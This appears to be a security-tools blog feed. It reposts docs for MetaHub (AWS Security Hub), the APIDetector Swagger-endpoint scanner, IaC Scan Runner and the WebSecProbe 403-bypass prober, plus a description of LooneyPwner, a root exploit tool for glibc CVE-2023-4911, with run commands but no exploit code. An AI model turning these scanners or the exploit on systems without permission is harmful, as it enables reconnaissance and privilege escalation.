MetaHub can be run as a Security Hub Custom Action. This allows you to run MetaHub directly from the Security Hub console for a selected finding or for a selected set of findings.


The custom action will then trigger a Lambda function that will run MetaHub for the selected findings. By default, the Lambda function will run MetaHub with the option --enrich-findings, which means that it will update your finding back with MetaHub outputs. If you want to change this, see Customize Lambda behavior

You need first to create the Lambda function and then create the custom action in Security Hub.

For creating the lambda function, follow the instructions in the Run with Lambda section.

For creating the AWS Security Hub custom action:

  1. In Security Hub, choose Settings and then choose Custom Actions.
  2. Choose Create custom action.
  3. Provide a Name, Description, and Custom action ID for the action.
  4. Choose Create custom action. (Make a note of the Custom action ARN. You need to use the ARN when you create a rule to associate with this action in EventBridge.)
  5. In EventBridge, choose Rules and then choose Create rule.
  6. Enter a name and description for the rule.
  7. For the Event bus, choose the event bus that you want to associate with this rule. If you want this rule to match events that come from your account, select default. When an AWS service in your account emits an event, it always goes to your account's default event bus.
  8. For Rule type, choose a rule with an event pattern and then press Next.
  9. For Event source, choose AWS events.
  10. For the Creation method, choose Use pattern form.
  11. For Event source, choose AWS services.
  12. For AWS service, choose Security Hub.
  13. For Event type, choose Security Hub Findings - Custom Action.
  14. Choose Specific custom action ARNs and add a custom action ARN.
  15. Choose Next.
  16. Under Select targets, choose the Lambda function
  17. Select the Lambda function you created for MetaHub.

AWS Authentication

  • Ensure you have AWS credentials set up on your local machine (or from where you will run MetaHub).

For example, you can use aws configure option.

aws configure

Or you can export your credentials to the environment.

export AWS_DEFAULT_REGION="us-east-1"
export AWS_ACCESS_KEY_ID= "ASXXXXXXX"
export AWS_SECRET_ACCESS_KEY= "XXXXXXXXX"
export AWS_SESSION_TOKEN= "XXXXXXXXX"

Configuring Security Hub

  • If you are running MetaHub for a single AWS account setup (AWS Security Hub is not aggregating findings from different accounts), you don't need to use any additional options; MetaHub will use the credentials in your environment. Still, if your IAM design requires it, it is possible to log in and assume a role in the same account you are logged in. Just use the options --sh-assume-role to specify the role and --sh-account with the same AWS Account ID where you are logged in.

  • --sh-region: The AWS Region where Security Hub is running. If you don't specify a region, it will use the one configured in your environment. If you are using AWS Security Hub Cross-Region aggregation, you should use that region as the --sh-region option so that you can fetch all findings together.

  • --sh-account and --sh-assume-role: The AWS Account ID where Security Hub is running and the AWS IAM role to assume in that account. These options are helpful when you are logged in to a different AWS Account than the one where AWS Security Hub is running or when running AWS Security Hub in a multiple AWS Account setup. Both options must be used together. The role provided needs to have enough policies to get and update findings in AWS Security Hub (if needed). If you don't specify a --sh-account, MetaHub will assume the one you are logged in.

  • --sh-profile: You can also provide your AWS profile name to use for AWS Security Hub. When using this option, you don't need to specify --sh-account or --sh-assume-role as MetaHub will use the credentials from the profile. If you are using --sh-account and --sh-assume-role, those options take precedence over --sh-profile.

IAM Policy for Security Hub

This is the minimum IAM policy you need to read and write from AWS Security Hub. If you don't want to update your findings with MetaHub, you can remove the securityhub:BatchUpdateFindings action.

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"security hub:GetFindings",
"security hub:ListFindingAggregators",
"security hub:BatchUpdateFindings",
"iam:ListAccountAliases"
],
"Resource": [
"*"
]
}
]
}

Configuring Context

If you are running MetaHub for a multiple AWS Account setup (AWS Security Hub is aggregating findings from multiple AWS Accounts), you must provide the role to assume for Context queries because the affected resources are not in the same AWS Account that the AWS Security Hub findings. The --mh-assume-role will be used to connect with the affected resources directly in the affected account. This role needs to have enough policies for being able to describe resources.

IAM Policy for Context

The minimum policy needed for context includes the managed policy arn:aws:iam::aws:policy/SecurityAudit and the following actions:

  • tag:GetResources
  • lambda:GetFunction
  • lambda:GetFunctionUrlConfig
  • cloudtrail:LookupEvents
  • account:GetAlternateContact
  • organizations:DescribeAccount
  • iam:ListAccountAliases

Examples

Inputs

MetaHub can read security findings directly from AWS Security Hub using its API. If you don't use Security Hub, you can use any ASFF-based scanner. Most cloud security scanners support the ASFF format. Check with them or leave an issue if you need help.

If you want to read from an input ASFF file, you need to use the options:

./metahub.py --inputs file-asff --input-asff path/to/the/file.json.asff path/to/the/file2.json.asff

You also can combine AWS Security Hub findings with input ASFF files specifying both inputs:

./metahub.py --inputs file-asff securityhub --input-asff path/to/the/file.json.asff

When using a file as input, you can't use the option --sh-filters for filter findings, as this option relies on AWS API for filtering. You can't use the options --update-findings or --enrich-findings as those findings are not in the AWS Security Hub. If you are reading from both sources at the same time, only the findings from AWS Security Hub will be updated.

Output Modes

MetaHub can generate different programmatic and visual outputs. By default, all output modes are enabled: json-short, json-full, json-statistics, json-inventory, html, csv, and xlsx.

The outputs will be saved in the outputs/ folder with the execution date.

If you want only to generate a specific output mode, you can use the option --output-modes with the desired output mode.

For example, if you only want to generate the output json-short, you can use:

./metahub.py --output-modes json-short

If you want to generate json-short, json-full and html outputs, you can use:

./metahub.py --output-modes json-short json-full html

JSON

JSON-Short

Show all findings titles together under each affected resource and the AwsAccountId, Region, and ResourceType:

JSON-Full

Show all findings with all data. Findings are organized by ResourceId (ARN). For each finding, you will also get: SeverityLabel, Workflow, RecordState, Compliance, Id, and ProductArn:

JSON-Inventory

Show a list of all resources with their ARN.

JSON-Statistics

Show statistics for each field/value. In the output, you will see each field/value and the number of occurrences; for example, the following output shows statistics for six findings.

HTML

You can create rich HTML reports of your findings, adding your context as part of them.

HTML Reports are interactive in many ways:

  • You can add/remove columns.
  • You can sort and filter by any column.
  • You can auto-filter by any column
  • You can group/ungroup findings
  • You can also download that data to xlsx, CSV, HTML, and JSON.


CSV

You can create CSV reports of your findings, adding your context as part of them.

Β 

XLSX

Similar to CSV but with more formatting options.


Customize HTML, CSV or XLSX outputs

You can customize which Context keys to unroll as columns for your HTML, CSV, and XLSX outputs using the options --output-tag-columns and --output-config-columns (as a list of columns). If the keys you specified don't exist for the affected resource, they will be empty. You can also configure these columns by default in the configuration file (See Customizing Configuration).

For example, you can generate an HTML output with Tags and add "Owner" and "Environment" as columns to your report using the:

./metahub --output-modes html --output-tag-columns Owner Environment

Filters

You can filter the security findings and resources that you get from your source in different ways and combine all of them to get exactly what you are looking for, then re-use those filters to create alerts.

Security Hub Filtering

MetaHub supports filtering AWS Security Hub findings in the form of KEY=VALUE filtering for AWS Security Hub using the option --sh-filters, the same way you would filter using AWS CLI but limited to the EQUALS comparison. If you want another comparison, use the option --sh-template Security Hub Filtering using YAML templates.

You can check available filters in AWS Documentation

./metahub --sh-filters <KEY=VALUE>

If you don't specify any filters, default filters are applied: RecordState=ACTIVE WorkflowStatus=NEW

Passing filters using this option resets the default filters. If you want to add filters to the defaults, you need to specify them in addition to the default ones. For example, adding SeverityLabel to the default filters:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW

If a value contains spaces, you should specify it using double quotes: "ProductName="Security Hub"

You can add how many different filters you need to your query and also add the same filter key with different values:

Examples:

  • Filter by Severity (CRITICAL):
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
  • Filter by Severity (CRITICAL and HIGH):
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL SeverityLabel=HIGH
  • Filter by Severity and AWS Account:
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL AwsAccountId=1234567890
  • Filter by Check Title:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW Title="EC2.22 Unused EC2 security groups should be removed"
  • Filter by AWS Resource Type:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup
  • Filter by Resource ID:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceId="arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890"
  • Filter by Finding Id:
./metahub --sh-filters Id="arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.19/finding/01234567890-1234-1234-1234-01234567890"
  • Filter by Compliance Status:
./metahub --sh-filters ComplianceStatus=FAILED

Security Hub Filtering using YAML templates

MetaHub lets you create complex filters using YAML files (templates) that you can re-use when needed. YAML templates let you write filters using any comparison supported by AWS Security Hub like "EQUALS' | 'PREFIX' | 'NOT_EQUALS' | 'PREFIX_NOT_EQUALS". You can call your YAML file using the option --sh-template <<FILE>>.

You can find examples under the folder templates

  • Filter using YAML template default.yml:
./metaHub --sh-template templates/default.yml

Config Filters

MetaHub supports Config filters (and associations) using KEY=VALUE where the value can only be True or False using the option --mh-filters-config. You can use as many filters as you want and separate them using spaces. If you specify more than one filter, you will get all resources that match all filters.

Config filters only support True or False values:

  • A Config filter set to True means True or with data.
  • A Config filter set to False means False or without data.

Config filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Context for the AWS-affected resources based on the previous list of findings
  3. MetaHub only shows you the resources that match your --mh-filters-config, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are associated to Network Interfaces (network_interfaces=True):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-config network_interfaces=True
  • Get all S3 Buckets (ResourceType=AwsS3Bucket) only if they are public (public=True):
./metahub --sh-filters ResourceType=AwsS3Bucket --mh-filters-config public=False

Tags Filters

MetaHub supports Tags filters in the form of KEY=VALUE where KEY is the Tag name and value is the Tag Value. You can use as many filters as you want and separate them using spaces. Specifying multiple filters will give you all resources that match at least one filter.

Tags filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Tags for the AWS-affected resources based on the previous list of findings
  3. MetaHub only shows you the resources that match your --mh-filters-tags, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are tagged with a tag Environment and value Production:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-tags Environment=Production

Updating Workflow Status

You can use MetaHub to update your AWS Security Hub Findings workflow status (NOTIFIED, NEW, RESOLVED, SUPPRESSED) with a single command. You will use the --update-findings option to update all the findings from your MetaHub query. This means you can update one, ten, or thousands of findings using only one command. AWS Security Hub API is limited to 100 findings per update. Metahub will split your results into 100 items chucks to avoid this limitation and update your findings beside the amount.

For example, using the following filter: ./metahub --sh-filters ResourceType=AwsSageMakerNotebookInstance RecordState=ACTIVE WorkflowStatus=NEW I found two affected resources with three finding each making six Security Hub findings in total.

Running the following update command will update those six findings' workflow status to NOTIFIED with a Note:

./metahub --update-findings Workflow=NOTIFIED Note="Enter your ticket ID or reason here as a note that you will add to the finding as part of this update."




The --update-findings will ask you for confirmation before updating your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Enriching Findings

You can use MetaHub to enrich back your AWS Security Hub Findings with Context outputs using the option --enrich-findings. Enriching your findings means updating them directly in AWS Security Hub. MetaHub uses the UserDefinedFields field for this.

By enriching your findings directly in AWS Security Hub, you can take advantage of features like Insights and Filters by using the extra information not available in Security Hub before.

For example, you want to enrich all AWS Security Hub findings with WorkflowStatus=NEW, RecordState=ACTIVE, and ResourceType=AwsS3Bucket that are public=True with Context outputs:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsS3Bucket --mh-filters-checks public=True --enrich-findings



The --enrich-findings will ask you for confirmation before enriching your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Findings Aggregation

Working with Security Findings sometimes introduces the problem of Shadowing and Duplication.

Shadowing is when two checks refer to the same issue, but one in a more generic way than the other one.

Duplication is when you use more than one scanner and get the same problem from more than one.

Think of a Security Group with port 3389/TCP open to 0.0.0.0/0. Let's use Security Hub findings as an example.

If you are using one of the default Security Standards like AWS-Foundational-Security-Best-Practices, you will get two findings for the same issue:

  • EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports
  • EC2.19 Security groups should not allow unrestricted access to ports with high risk

If you are also using the standard CIS AWS Foundations Benchmark, you will also get an extra finding:

  • 4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389

Now, imagine that SG is not in use. In that case, Security Hub will show an additional fourth finding for your resource!

  • EC2.22 Unused EC2 security groups should be removed

So now you have in your dashboard four findings for one resource!

Suppose you are working with multi-account setups and many resources. In that case, this could result in many findings that refer to the same thing without adding any extra value to your analysis.

MetaHub aggregates security findings under the affected resource.

This is how MetaHub shows the previous example with output-mode json-short:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
"EC2.19 Security groups should not allow unrestricted access to ports with high risk",
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports",
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389",
"EC2.22 Unused EC2 security groups should be removed"
],
"AwsAccountId": "01234567890",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

This is how MetaHub shows the previous example with output-mode json-full:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
{
"EC2.19 Security groups should not allow unrestricted access to ports with high risk": {
"SeverityLabel": "CRITICAL",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",< br/> "Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.22 Unused EC2 security groups should be removed": {
"SeverityLabel": "MEDIUM",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
}
],
"AwsAccountId": "01234567890",
"AwsAccountAlias": "obfuscated",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

Your findings are combined under the ARN of the resource affected, ending in only one result or one non-compliant resource.

You can now work in MetaHub with all these four findings together as if they were only one. For example, you can update these four Workflow Status findings using only one command: See Updating Workflow Status

Contributing

You can follow this guide if you want to contribute to the Context module guide.



APIDetector - Efficiently Scan For Exposed Swagger Endpoints Across Web Domains And Subdomains

By: Zion3R


APIDetector is a powerful and efficient tool designed for testing exposed Swagger endpoints in various subdomains with unique smart capabilities to detect false-positives. It's particularly useful for security professionals and developers who are engaged in API testing and vulnerability scanning.


Features

  • Flexible Input: Accepts a single domain or a list of subdomains from a file.
  • Multiple Protocols: Option to test endpoints over both HTTP and HTTPS.
  • Concurrency: Utilizes multi-threading for faster scanning.
  • Customizable Output: Save results to a file or print to stdout.
  • Verbose and Quiet Modes: Default verbose mode for detailed logs, with an option for quiet mode.
  • Custom User-Agent: Ability to specify a custom User-Agent for requests.
  • Smart Detection of False-Positives: Ability to detect most false-positives.

Getting Started

Prerequisites

Before running APIDetector, ensure you have Python 3.x and pip installed on your system. You can download Python here.

Installation

Clone the APIDetector repository to your local machine using:

git clone https://github.com/brinhosa/apidetector.git
cd apidetector
pip install requests

Usage

Run APIDetector using the command line. Here are some usage examples:

  • Common usage, scan with 30 threads a list of subdomains using a Chrome user-agent and save the results in a file:

    python apidetector.py -i list_of_company_subdomains.txt -o results_file.txt -t 30 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
  • To scan a single domain:

    python apidetector.py -d example.com
  • To scan multiple domains from a file:

    python apidetector.py -i input_file.txt
  • To specify an output file:

    python apidetector.py -i input_file.txt -o output_file.txt
  • To use a specific number of threads:

    python apidetector.py -i input_file.txt -t 20
  • To scan with both HTTP and HTTPS protocols:

    python apidetector.py -m -d example.com
  • To run the script in quiet mode (suppress verbose output):

    python apidetector.py -q -d example.com
  • To run the script with a custom user-agent:

    python apidetector.py -d example.com -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"

Options

  • -d, --domain: Single domain to test.
  • -i, --input: Input file containing subdomains to test.
  • -o, --output: Output file to write valid URLs to.
  • -t, --threads: Number of threads to use for scanning (default is 10).
  • -m, --mixed-mode: Test both HTTP and HTTPS protocols.
  • -q, --quiet: Disable verbose output (default mode is verbose).
  • -ua, --user-agent: Custom User-Agent string for requests.

RISK DETAILS OF EACH ENDPOINT APIDETECTOR FINDS

Exposing Swagger or OpenAPI documentation endpoints can present various risks, primarily related to information disclosure. Here's an ordered list based on potential risk levels, with similar endpoints grouped together APIDetector scans:

1. High-Risk Endpoints (Direct API Documentation):

  • Endpoints:
    • '/swagger-ui.html', '/swagger-ui/', '/swagger-ui/index.html', '/api/swagger-ui.html', '/documentation/swagger-ui.html', '/swagger/index.html', '/api/docs', '/docs', '/api/swagger-ui', '/documentation/swagger-ui'
  • Risk:
    • These endpoints typically serve the Swagger UI interface, which provides a complete overview of all API endpoints, including request formats, query parameters, and sometimes even example requests and responses.
    • Risk Level: High. Exposing these gives potential attackers detailed insights into your API structure and potential attack vectors.

2. Medium-High Risk Endpoints (API Schema/Specification):

  • Endpoints:
    • '/openapi.json', '/swagger.json', '/api/swagger.json', '/swagger.yaml', '/swagger.yml', '/api/swagger.yaml', '/api/swagger.yml', '/api.json', '/api.yaml', '/api.yml', '/documentation/swagger.json', '/documentation/swagger.yaml', '/documentation/swagger.yml'
  • Risk:
    • These endpoints provide raw Swagger/OpenAPI specification files. They contain detailed information about the API endpoints, including paths, parameters, and sometimes authentication methods.
    • Risk Level: Medium-High. While they require more interpretation than the UI interfaces, they still reveal extensive information about the API.

3. Medium Risk Endpoints (API Documentation Versions):

  • Endpoints:
    • '/v2/api-docs', '/v3/api-docs', '/api/v2/swagger.json', '/api/v3/swagger.json', '/api/v1/documentation', '/api/v2/documentation', '/api/v3/documentation', '/api/v1/api-docs', '/api/v2/api-docs', '/api/v3/api-docs', '/swagger/v2/api-docs', '/swagger/v3/api-docs', '/swagger-ui.html/v2/api-docs', '/swagger-ui.html/v3/api-docs', '/api/swagger/v2/api-docs', '/api/swagger/v3/api-docs'
  • Risk:
    • These endpoints often refer to version-specific documentation or API descriptions. They reveal information about the API's structure and capabilities, which could aid an attacker in understanding the API's functionality and potential weaknesses.
    • Risk Level: Medium. These might not be as detailed as the complete documentation or schema files, but they still provide useful information for attackers.

4. Lower Risk Endpoints (Configuration and Resources):

  • Endpoints:
    • '/swagger-resources', '/swagger-resources/configuration/ui', '/swagger-resources/configuration/security', '/api/swagger-resources', '/api.html'
  • Risk:
    • These endpoints often provide auxiliary information, configuration details, or resources related to the API documentation setup.
    • Risk Level: Lower. They may not directly reveal API endpoint details but can give insights into the configuration and setup of the API documentation.

Summary:

  • Highest Risk: Directly exposing interactive API documentation interfaces.
  • Medium-High Risk: Exposing raw API schema/specification files.
  • Medium Risk: Version-specific API documentation.
  • Lower Risk: Configuration and resource files for API documentation.

Recommendations:

  • Access Control: Ensure that these endpoints are not publicly accessible or are at least protected by authentication mechanisms.
  • Environment-Specific Exposure: Consider exposing detailed API documentation only in development or staging environments, not in production.
  • Monitoring and Logging: Monitor access to these endpoints and set up alerts for unusual access patterns.

Contributing

Contributions to APIDetector are welcome! Feel free to fork the repository, make changes, and submit pull requests.

Legal Disclaimer

The use of APIDetector should be limited to testing and educational purposes only. The developers of APIDetector assume no liability and are not responsible for any misuse or damage caused by this tool. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no responsibility for unauthorized or illegal use of this tool. Before using APIDetector, ensure you have permission to test the network or systems you intend to scan.

License

This project is licensed under the MIT License.

Acknowledgments



Iac-Scan-Runner - Service That Scans Your Infrastructure As Code For Common Vulnerabilities

By: Zion3R


Service that scans your Infrastructure as Code for common vulnerabilities.

Aspect Information
Tool name IaC Scan Runner
Docker image xscanner/runner
PyPI package iac-scan-runner
Documentation docs
Contact us xopera@xlab.si

Purpose and description

The IaC Scan Runner is a REST API service used to scan IaC (Infrastructure as Code) package and perform various code checks in order to find possible vulnerabilities and improvements. Explore the docs for more info.

Running

This section explains how to run the REST API.

Run with Docker

You can run the REST API using a public xscanner/runner Docker image as follows:

# run IaC Scan Runner REST API in a Docker container and 
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 xscanner/runner

Or you can build the image locally and run it as follows:

# build Docker container (it will take some time) 
$ docker build -t iac-scan-runner .
# run IaC Scan Runner REST API in a Docker container and
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 iac-scan-runner

Run from CLI

To run using the IaC Scan Runner CLI:

# install the CLI
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install iac-scan-runner
# print OpenAPI specification
(.venv) $ iac-scan-runner openapi
# install prerequisites
(.venv) $ iac-scan-runner install
# run IaC Scan Runner REST API
(.venv) $ iac-scan-runner run

Run from source

To run locally from source:

# Export env variables 
export MONGODB_CONNECTION_STRING=mongodb://localhost:27017
export SCAN_PERSISTENCE=enabled
export USER_MANAGEMENT=enabled

# Setup MongoDB
$ docker run --name mongodb -p 27017:27017 mongo

# install prerequisites
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install -r requirements.txt
(.venv) $ ./install-checks.sh
# run IaC Scan Runner REST API (add --reload flag to apply code changes on the way)
(.venv) $ uvicorn src.iac_scan_runner.api:app

Usage and examples

This part will show one of the possible deployments and short examples on how to use API calls.

Firstly we will clone the iac scan runner repository and run the API.

$ git clone https://github.com/xlab-si/iac-scan-runner.git
$ docker compose up

After this is done you can use different API endpoints by calling localhost:8000. You can also navigate to localhost:8000/swagger or localhost:8000/redoc and test all the API endpoints there. In this example, we will use curl for calling API endpoints.

  1. Lets create a project named test.
curl -X 'POST' \
'http://0.0.0.0/project?creator_id=test' \
-H 'accept: application/json' \
-d ''

project id will be returned to us. For this example project id is 1e7b2a91-2896-40fd-8d53-83db56088026.

  1. For example, let say we want to initiate all check expect ansible-lint. Let's disable it.
curl -X 'PUT' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/checks/ansible-lint/disable' \
-H 'accept: application/json'
  1. Now when project is configured, we can simply choose files that we want to scan and zip them. For IaC-Scan-Runner to work files are expected to be a compressed archives (usually zip files). In this case response type will be json , but it is possible to change it to html.Please change YOUR.zip to path of your file.
curl -X 'POST' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/scan?scan_response_type=json' \
-H 'accept: application/json' \
-H 'Content-Type: multipart/form-data' \
-F 'iac=@YOUR.zip;type=application/zip'

That is it.

Extending the scan workflow with new check tools

At certain point, it might be required to include new check tools within the scan workflow, with aim to provide wider coverage of IaC standards and project types. Therefore, in this subsection, a sequence of required steps for that purpose is identified and described. However, the steps have to be performed manually as it will be described, but it is planned to automatize this procedure in future via API and provide user-friendly interface that will aid the user while importing new tools that will become part of the available catalogue that makes the scan workflow. Figure 16 depicts the required steps which have to be taken in order to extend the scan workflow with a new tool.

Step 1 – Adding tool-specific class to checks directory First, it is required to add a new tool-specific Python class to the checks directory inside IaC Scan Runner’s source code: iac-scan-runner/src/iac_scan_runner/checks/new_tool.py
The class of a new tool inherits the existing Check class, which provides generalization of scan workflow tools. Moreover, it is necessary to provide implementation of the following methods:

  1. def configure(self, config_filename: Optional[str], secret: Optional[SecretStr])
  2. def run(self, directory: str) While the first one aims to provide the necessary tool-specific parameters in order to set it up (such as passwords, client ids and tokens), another one specifies how the tool itself is invoked via API or CLI and its raw output returned.

Step 2 – Adding the check tool class instance within ScanRunner constructor Once the new class derived from Check is added to the IaC Scan Runner’s source code, it is also required to modify the source code of its main class, called ScanRunner. When it comes to modifications of this class, it is required first to import the tool-specific class, create a new check tool-specific class instance and adding it to the dictionary of IaC checks inside def init_checks(self). A. Importing the check tool class from iac_scan_runner.checks.tfsec import TfsecCheck B. Creating new instance of check tool object inside init_checks """Initiate predefined check objects""" new_tool = NewToolCheck() C. Adding it to self.iac_checks dictionary inside init_checks

    self.iac_checks = {
new_tool.name: new_tool,
…
}

Step 3 – Adding the check tool to the compatibility matrix inside Compatibility class On the other side, inside file src/iac_scan_runner/compatibility.py, the dictionary which represents compatibility matrix should be extended as well. There are two possible cases: a) new file type should be added as a key, together with list of relevant tools as value b) new tool should be added to the compatibility list for the existing file type.

    compatibility_matrix = {
"new_type": ["new_tool_1", "new_tool_2"],
…
"old_typeK": ["tool_1", … "tool_N", "new_tool_3"]
}

Step 4 – Providing the support for result summarization Finally, the last step in sequence of required modifications for scan workflow extension is to modify class ResultsSummary (src/iac_scan_runner/results_summary.py). Precisely, it is required to append a part of the code to its method summarize_outcome that will look for specific strings which are tool-specific and can be used to identify whether the check passed or failed. Inside the loop that traverses the compatible checks, for each new tool the following structure of if-else should be included:

        if check == "new_tool":
if outcome.find("Check pass string") > -1:
self.outcomes[check]["status"] = "Passed"
return "Passed"
else:
self.outcomes[check]["status"] = "Problems"
return "Problems"

Contact

You can contact the xOpera team by sending an email to xopera@xlab.si.

Acknowledgement

This project has received funding from the European Union’s Horizon 2020 research and innovation programme under Grant Agreement No. 101000162 (PIACERE).



WebSecProbe - Web Security Assessment Tool, Bypass 403

By: Zion3R


A cutting-edge utility designed exclusively for web security aficionados, penetration testers, and system administrators. WebSecProbe is your advanced toolkit for conducting intricate web security assessments with precision and depth. This robust tool streamlines the intricate process of scrutinizing web servers and applications, allowing you to delve into the technical nuances of web security and fortify your digital assets effectively.


WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does:

  • It takes user input for the target URL and the path.
  • It defines a list of payloads that represent different HTTP request variations, such as URL-encoded characters, special headers, and different HTTP methods.
  • It iterates through each payload and constructs a full URL by appending the payload to the target URL.
  • For each constructed URL, it sends an HTTP GET request using the requests library, and it captures the response status code and content length.
  • It prints the constructed URL, status code, and content length for each request, effectively showing the results of each variation's response from the target server.
  • After testing all payloads, it queries the Wayback Machine (a web archive) to check if there are any archived snapshots of the target URL/path. If available, it prints the closest archived snapshot's information.

Does This Tool Bypass 403 ?

It doesn't directly attempt to bypass a 403 Forbidden status code. The code's purpose is more about testing the behavior of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code.

In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.

Β 

pip install WebSecProbe

WebSecProbe <URL> <Path>

Example:

WebSecProbe https://example.com admin-login

from WebSecProbe.main import WebSecProbe

if __name__ == "__main__":
url = 'https://example.com' # Replace with your target URL
path = 'admin-login' # Replace with your desired path

probe = WebSecProbe(url, path)
probe.run()



LooneyPwner - Exploit Tool For CVE-2023-4911, Targeting The 'Looney Tunables' Glibc Vulnerability In Various Linux Distributions

By: Zion3R


Exploit tool for CVE-2023-4911, targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.

LooneyPwner is a proof-of-concept (PoC) exploit tool targeting the critical buffer overflow vulnerability, nicknamed "Looney Tunables," found in the GNU C Library (glibc). This flaw, officially tracked as CVE-2023-4911, is present in various Linux distributions, posing significant risks, including unauthorized data access and system alterations.


The vulnerability in the GNU C Library (glibc) was disclosed last week, with notable security researchers and analysts releasing PoC exploits, indicating the potential for widespread attacks. The flaw, discovered by Qualys researchers, can grant attackers root privileges on various Linux distributions including Fedora, Ubuntu, and Debian.

Unauthorized root access provides attackers unrestricted authority, enabling them to:

  • Modify, delete, or steal sensitive data.
  • Install malicious software or backdoors.
  • Facilitate ongoing attacks that may remain undetected for extended periods.
  • Cause data breaches, accessing customer data, intellectual property, and financial records.
  • Disrupt critical system operations, potentially causing service outages and harming an organization's reputation.

LooneyPwner exploits the "Looney Tunables" flaw, targeting affected glibc versions. The tool:

  • Detects the installed glibc version.
  • Checks for vulnerability status.
  • Offers an option for exploitation if vulnerable.

chmod +x looneypwner.sh
./looneypwner.sh


This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.

This exploit code is based on the work of leesh3288. A big thanks to him for the foundational work on the exploit.



PathFinder - Tool That Provides Information About A Website

By: Zion3R


